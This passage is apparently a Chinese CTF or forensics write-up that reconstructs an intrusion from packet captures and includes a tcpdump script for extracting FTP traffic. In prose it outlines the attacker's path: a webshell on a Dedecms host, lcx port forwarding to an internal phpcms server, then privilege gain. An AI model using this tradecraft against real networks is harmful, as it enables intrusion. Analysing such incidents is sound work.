首先攻击者(172.16.10.110)通过一台可以访问到的 Windows 主机 192.168.20.117 (Dedecms) 拿到 webshell 以后
通过 lcx 将内网的主机 192.168.20.88 的 80 端口(phpcms)转发到 172.16.10.110 的 8888 端口
进一步利用漏洞拿到内网主机的权限

到这里 HTTP 层面的题目感觉应该已经分析的差不多了 , 只要拿到题目应该就可以直接填答案了
这道题目还提供了 ftp 的日志
应该还和 ftp 协议有关

#!/bin/bash
#ftp.sh

target_folder='ftp'

mkdir ${target_folder}

for file in `ls *.pcap`;
do
   echo "Dumping ftp package in ${file}..."
   tcpdump -A -s 0 'host 192.168.20.117 or host 192.168.20.248' -r $file -w ${target_folder}/${file}
   echo "${file} Done!"
done
image.png
image.png
image.png

虽然有 FTP 的包 , 但是似乎并没有日志中的IP
有可能是我数据包拷贝的不全 ?

推荐阅读更多精彩内容